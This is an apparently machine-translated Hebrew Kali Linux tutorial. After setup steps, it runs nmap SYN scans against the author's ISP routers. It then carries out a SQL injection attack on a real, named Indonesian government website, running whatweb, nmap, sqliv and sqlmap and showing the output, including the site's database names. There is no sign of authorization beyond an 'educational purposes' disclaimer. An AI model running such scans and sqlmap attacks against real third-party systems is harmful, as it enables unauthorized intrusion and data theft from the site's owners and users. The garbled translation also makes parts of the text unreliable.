מדריך קלי לינוקס

Kali Linux Tutorial



אם אתה מומחה או לפחות מכיר לינוקס, פקודות וסביבה, פשוט התקנת את Kali Linux במחשב שלך, רצית להיות מאסטר ב- Kali Linux או האקר אתי אז אתה נמצא במקום הנכון. במאמר זה אעסוק במדריך לינוקס של Kali למשתמשי לינוקס שאינם מכירים את קלי כבר ונתחיל אתכם בכמה מהטכניקות הבסיסיות המשמשות לפריצה ובדיקות אבטחה בעת השימוש בקאלי.

מהו Kali Linux?

Kali Linux, ( שוחרר לראשונה ב -13 במרץ, 2013 ) שנודעה רשמית בשם BackTrack, שפותחה על ידי חברת האבטחה Offensive Security, היא הפצה משפטית וממוקדת אבטחה המבוססת על סניף הבדיקות של דביאן. Kali Linux מתוכנן תוך מחשבה על בדיקות חדירה, שחזור נתונים וגילוי איומים. הפרויקט עבר למודל שחרור מתגלגל מוקדם יותר השנה במטרה לספק שירותי אבטחה עדכניים יותר למשתמשי ההפצה. קאלי לינוקס היא חינמית, ותמיד תהיה. הוא כולל 600+ כלי בדיקת חדירה.







למה קאלי לינוקס? האם זה מתאים לך?

קלי לינוקס זכתה לפופולריות רבה לאחרונה. ויש סיבה מאחורי זה. פריצה חזרה להיות הדבר המגניב ביותר בתרבות הפופולרית וניתן לייחס זאת באופן משמעותי לסדרת הטלוויזיה מר רובוט. הפופולריות של מר רובוט עזרה לקאלי לינוקס להשיג משתמשים חדשים. אנשים שכמעט ואינם יודעים לינוקס או משהו הקשור לאבטחת מחשבים מנסים כעת להשתמש בקאלי כהפצת הלינוקס העיקרית שלהם.



הפצת בדיקת החדירה המתקדמת ביותר שלנו, אי פעם. - מפתחי Kali Linux. (הוא כתוב בעמוד הראשי של Kali.org בראש הדף.) מה אתה מקבל מהאמירה הזו? האם אתה מבחין בכך: APTD (הפצת מתקדם בדיקת חדירה)? אין כאן מונח פריצה מילולית. Kali Linux זהה להפצות לינוקס אחרות. בפשטות, מדובר בהפצה של לינוקס עמוסה בכלים הקשורים לאבטחה וממוקדת למומחי אבטחת רשת ומחשבים. עם זאת, השימוש ב- Kali Linux מתמקד אך ורק באבטחה ובזיהוי פלילי.



הפצת לינוקס אינה אלא חבילה המכילה את ליבת לינוקס, מערכת של כלי עזר ויישומים וכמה הגדרות ברירת מחדל. לכן, Kali Linux אינה מציעה משהו ייחודי במובן זה ניתן להתקין את רוב הכלים המסופקים בכל הפצת לינוקס.





קלי לינוקס מיועדת במיוחד לדרישות של בדיקות חדירה מקצועיות וביקורת אבטחה. הוא מכוון לקבוצת משנה מסוימת של משתמשי לינוקס. פנטסטרים, האקרים וכו '.זו אינה הפצה מומלצת אם אתה מצפה לקאלי לשולחן העבודה הכללי של Linux לפיתוח, עיצוב אתרים, משחקים, משרד וכו'. קאלי עשויה לתת לך כמה אתגרים, גם אם אתה משתמש לינוקס מנוסה. .

דברים לעשות לאחר התקנת קלי לינוקס

לאחר התקנת Kali Linux, אתה עשוי לתהות מה לעשות הלאה עם זה, נכון ?. כולם מתמודדים עם הבעיה הזו, אל תדאג.



שלב 1: הגדר את המאגר

ראשית, ייתכן שאתה כבר יודע זאת, אך קריטי להגדיר את המאגר כראוי. כפי שאמרתי, מודל שחרור מתגלגל של קלי לינוקס משתדל לספק שירותי אבטחה עדכניים יותר למשתמשי ההפצה. באופן כללי, אם התקנת Kali Linux מחדש, המאגר מתייחס למדיה שבה אתה משתמש להתקנה. כדי לתקן זאת עליך לשנות את המאגר למאגר הרשמי של Kali Linux. הקובץ הנדרש נמצא מתחת /etc/apt/sources.list . פתח את הקובץ עם עורך הטקסט של leafpad והחלף את מאגר ברירת המחדל למאגר הרשמי של Kali Rolling:

deb http://http.kali.org/kali kali-rolling main contrib non-free # For source package access, uncomment the following line # deb-src http://http.kali.org/kali kali-rolling main contrib non-free 

שלב 2: עדכון ושדרוג LINUX KALI שלך

לאחר עדכון ושדרוג המערכת שלך, סנכרן את Kali Linux לגרסה העדכנית ביותר. לשם כך פתח את הטרמינל והקלד:

apt update -y && apt upgrade -y && apt dist-upgrade 

פקודת העדכון המתאים מוריד ומביא את החבילה מפרטת מידע מהמאגרים ומעדכנת אותם כדי לקבל מידע על הגרסאות החדשות ביותר של החבילות והתלות שלהן.

פקודת השדרוג המתאים מורידה ומתקינה גרסה חדשה יותר של חבילות חבילות Kali Linux המותקנות כל עוד אין לה שגיאות בתלות.

שדרוג ההרחק המתאים יעדכן את כל החבילות לגרסה העדכנית ביותר הזמינה, לא משנה מה. וגם להתקין ולהסיר תלות לפי הצורך (התקן תלות כדי לספק חבילות, מן הסתם, אך גם הסר תלות שהתייתמה אם חבילה שהתעדכנה כבר לא הייתה זקוקה לתלות.

תפיסה בסיסית לבדיקת החזרה עם קאלי לינוקס

לאחר שביצעת את השלבים הללו בהצלחה, ישנם שלושה דברים עיקריים שתוכל לעשות עם Kali Linux המבוססים על המערכת הממוקדת, כולל:

  1. פריצה לרשת אלחוטית - פריצת Wifi, פיזינג, הרעלת ARP וכו '.
  2. פריצה לאפליקציות אינטרנט -הזרקת SQL, זיוף בקשות בין אתרים (CSRF), פיזינג באינטרנט וכו '.
  3. פריצת מכשירים - נצל את מכונת המטרה כדי להשיג שליטה עליה.

אני לא כולל פריצת IoT, זה לא אומר שלקאלי לינוקס אין יכולת למטרה זו. אבל, פשוטו כמשמעו, זה יכול להיות שייך גם לפריצת מכשירים. מכיוון שלמכשיר יש מראה פיזי וצורה. במדריך זה סקרתי את הידע הבסיסי עליהם. מכיוון שקאלי לינוקס היא ענקית, היא לא מתאימה למאמר אחד!

עליך גם לדעת את מחזור בדיקת החדירה או את ההליך. הם:

  1. סיור - איסוף מידע
  2. סריקה
  3. פעולה
  4. לאחר ניצול

פריצת רשת אלחוטית עם קאלי לינוקס

מבחינת פריצה לרשת אלחוטית, הקורבן עשוי להשתנות. כי, רשתות אלחוטיות מורכבות מכמה דברים, כגון ספק שירותי אינטרנט (ספק שירותי אינטרנט), הנתב וחבריו (מודם, רכזת, מתג וכו ') והלקוחות (משתמשים, טלוויזיה במעגל סגור, מחשב מרוחק וכו'). יש להם גם אפשרויות פגיעות.

האינטרנט הוא צבירה גדולה ומורכבת של חומרת רשת המחוברת יחד באמצעות שערים. חשוב לעקוב אחר המסלול שאליו מנות החבילות שלך כדי לדעת כיצד אתה מגיע לשם מארח או כתובת IP מסוימת.

ל- Kali Linux יש כלי מובנה בשם Traceroute. Traceroute מנצל את זמן פרוטוקול ה- IP כדי לחיות בשטח ומנסה לעורר תגובה של ICMP TIME_EXCEEDED מכל שער לאורך הנתיב למארח כלשהו. Traceroute מנסה לעקוב אחר המסלול שחבילת IP תלך לאיזה מארח אינטרנט על ידי השקת מנות בדיקה עם TTL קטן (זמן לחיות) ואז האזנה לזמן ICMP חרגה מתשובה משער. אני אתן לך ודוגמה כיצד לעקוב אחר נתב ספקי אינטרנט המשמש לטיפול בחיבור שלנו באמצעות Traceroute.

1. הכרה

איסוף מידע הוא התחלה החשובה ביותר, אל תפספסו את השלב הזה. בשלב זה, מטרתנו היא להשיג כמה שיותר מידע שימושי שנוכל לקבל, ולאחר מכן מידע זה משמש לצעדים נוספים.

ראשית, פתח מסוף והקלד פקודה זו כדי להתחיל להתחקות אחר הכביש לאתר, במקרה זה הגדרתי את האתר ל- google.com.

traceroute google.com 

צילום מסך של Traceroute

2. סריקה

לאחר שנפעיל את הפקודות, הוא יפרט לאן החבילה שלנו הולכת ברצף. כפי שאתה יכול לראות למעלה, יש לי 3 כשותות אחת מהן היא שרת ספק האינטרנט שלי. ה- IP הראשון ברשימה הוא הנתב שלי, המשמש כשער. ושניהם הבאים שייכים לספק האינטרנט שלי. כעת נבדוק את השירות שהם מפעילים באמצעות Nmap. אז, המטרות שאנו הולכים לסרוק הן 10.152.192.1 ו 10.13.223.102 . במסוף הפעלתי את הפקודה הבאה:

nmap -v -sS [IP Target] -Pn 

בואו נשבור את טיעון הפקודה:

-v = אפשר מצב מילוליות

-sS = השתמש בטכניקת סריקת TCP SYN

-Pn = התייחס לכל המארחים כאל מקוונים -דלג על גילוי מארח

והנה התוצאה שקיבלנו.

צילום מסך nmap 2

למרבה הצער, כל היציאות מופעלות 10.152.192.1 מסוננים, המשמעות היא שכל חיבורי ה- TCP הנכנסים חסומים על ידי מזהים או חומת אש ב- IP זה. כעת, בואו ניקח סריקה נוספת ליעד השני.

צילום מסך nmap 1

3. מבצע

בהליך זה, אין בכוונתי לנהל את הניצול האמיתי, במקום זאת אני מראה לך כיצד. בהתבסס על תוצאת הסריקה של Nmap למעלה אנו יודעים של- IP הזה יש שרת SSH הפועל ביציאה 22 והוא פתוח. זה פתוח בכפייה, חחח! מצאנו את החור, שרת SSH הזה הוא החור האפשרי שנוכל לנסות להשיג אליו. ישנם מספר כלים בקאלי לינוקס התומכים בהתקפות ברוטו -כוח או מילון כנגד פרוטוקול SSH. הפופולרית והחזקה ביותר היא הידרה.

אוקיי, זה היה הליך בסיסי לביצוע בדיקת חדירה מול שרת ממוקד, שבדוגמה שלנו כאן הוא שרת ספקי האינטרנט שלי.

פריצות אפליקציות אינטרנט עם קלי לינוקס

למעשה, אם אתה מתלהב מכך, תוכל להגדיר את סביבת הפריצה שלך על ידי התקנת DWVA (אפליקציית אינטרנט פגיעה לעזאזל) ב- Kali Linux שלך. זהו יישום אינטרנט PHP/MySQL שיש בו חור של חורים פגיעים. מטרותיו העיקריות הן להוות עזרה לאנשי אבטחה לבדיקת כישוריהם וכלים בסביבה משפטית, ולסייע למפתחי אתרים להבין טוב יותר את תהליכי אבטחת יישומי האינטרנט. אתה יכול לקבל DWVA בחינם ב- Github כאן: https://github.com/ethicalhack3r/DVWA.

לעת עתה אני אראה לך כיצד לבצע פריצה לאפליקציות אינטרנט באתר אמיתי. אבל, הבטח לי שזה מוגבל למטרות חינוכיות בלבד. נדמה התקפה אמיתית על אתר אמיתי באמצעות הזרקת SQL.

תְנַאִי מוּקדָם

הכלים המכוסים:

-Whatweb (מותקן מראש)

-Nmap (מותקן מראש)

- SQLiv (התקן ידנית)

-SQLMap (מותקן מראש)

אנו זקוקים לכלי נוסף נוסף הזמין ב- Github כאן: https://github.com/Hadesy2k/sqliv, התקן אותו תחילה ב- Kali Linux שלנו. כלי זה בשם SQLiv המסוגל לבצע סריקה ממוקדת על ידי מתן דומיין ספציפי (עם סריקה). הקלד את הטרמינל:

git clone https://github.com/Hadesy2k/sqliv.git cd sqliv && sudo python2 setup.py -i 

יעד: www.trenggalekkab.go.id

1. הכרה

אסוף מידע שימושי ככל שנוכל להשיג. נוכל לפתוח את דף האינטרנט ולזהות איזו אפליקציה פועלת באתר זה. ראשית, נבדוק באיזה סוג אתר מדובר. אנו הולכים להשתמש ב- whatweb לשם כך.

whatweb www.trenggalekkab.go.id 

איזה צילום מסך אינטרנט

כפי שאתה יכול לראות את התוצאה למעלה, היעד ממוקם באינדונזיה. זה פועל Apache v2.2.27 בשרת האינטרנט שלו וגם יש PHP v5.4.31 , יש לה כתובת IP 103.247.21.142 . בסדר, שים לב לזה. ייתכן שיהיה עליך לבקר בדף האינטרנט שלו, לחפש את הקובץ או הדף שנבנה, פרמטרים של כתובת אתר או אפילו טופס התחברות. לעת עתה אנו זקוקים לכתובת ה- IP הזו לשלב הבא הסריקה.

2. סריקה

כמו בעבר, אנו משתמשים ב- Nmap שוב כדי לסרוק אילו יציאות ושירותים פועלים במטרה.

nmap -v -sS 103.247.21.142 

והנה התוצאה שקיבלנו:

Completed SYN Stealth Scan at 21:22, 261.93s elapsed (1000 total ports) Nmap scan report for ip-103-247-21-142.wifian.net.id (103.247.21.142) Host is up (0.069s latency). Not shown: 985 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 212/tcp open anet 443/tcp open https 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s 3128/tcp filtered squid-http  3306/tcp open mysql  

ישנן המון יציאות פתוחות המטפלות בכל שירות ביעד, אך זו שנראית מושכת את העין היא ששירות mysql ביציאה 3306. מצוין כי אתר זה משתמש mysql לנהל את המידע שלהם במאגרי מידע. לאחר מכן, אני תוהה אם יש פגיעות של הזרקת SQL באתר זה. אז אני סורק את האתר שוב באמצעות SQLiv שהתקנו זה עתה. הקלדתי את הפקודה:

sqliv -t www.trenggalekkab.go.id 

צילום מסך SQLHacking1

מצאנו 2 כתובות אתרים פגיעות מסוג SQL באתר זה. שימו לב לאותם כתובות אתרים.

3. מבצע

אוקיי, יש לנו כתובות אתרים פגיעות ב- SQL ומוכנות לביצוע. לשם כך נשתמש ב- SQLMap. התחביר הוא:

sqlmap [Vulnerable URL] --dbs 

הפקודה צריכה להיראות כך:

 sqlmap -u "http://www.trenggalekkab.go.id/berita.php?page=208" --dbs 

הטיעון –dbs הוא להגיד ל- SQLMap להשיג מסדי נתונים של יעד. להלן הפלט שקיבלנו:

[INFO] the back-end DBMS is MySQL web application technology: PHP 5.4.31, Apache 2.2.27 back-end DBMS: MySQL 5 [21:46:04] [INFO] fetching database names [21:46:04] [INFO] the SQL query used returns 2 entries [21:46:04] [INFO] resumed: information_schema [21:46:04] [INFO] resumed: trengkab_trg available databases [2]: [*] information_schema [*] trengkab_trg 

SQLMap מצא 2 מאגרי מידע, אך רק אחד מהם המכיל נתונים רגישים, כגון חשבון אישורי מנהל. זה ב- trengkab_trg. לאחר שמצאנו את מאגרי המידע, יש עוד שלב שעלינו לעשות. כלומר למצוא את הטבלאות והעמודות והשלב האחרון הוא לזרוק את הנתונים. לא אראה לך כיצד כאן בקטע זה, שימוש ביעד זה. לפחות אתה מכיר את הרעיון הבסיסי של מחזור ההתקפה, ושימוש בכמה כלים.

פריצה למכשיר

במאמר עתידי באתר זה נעסוק בפריצות למכשירים, המשך לעקוב. כאזהרה מראש תרצה לוודא שאתה מכיר קצת פייתון לשם כך.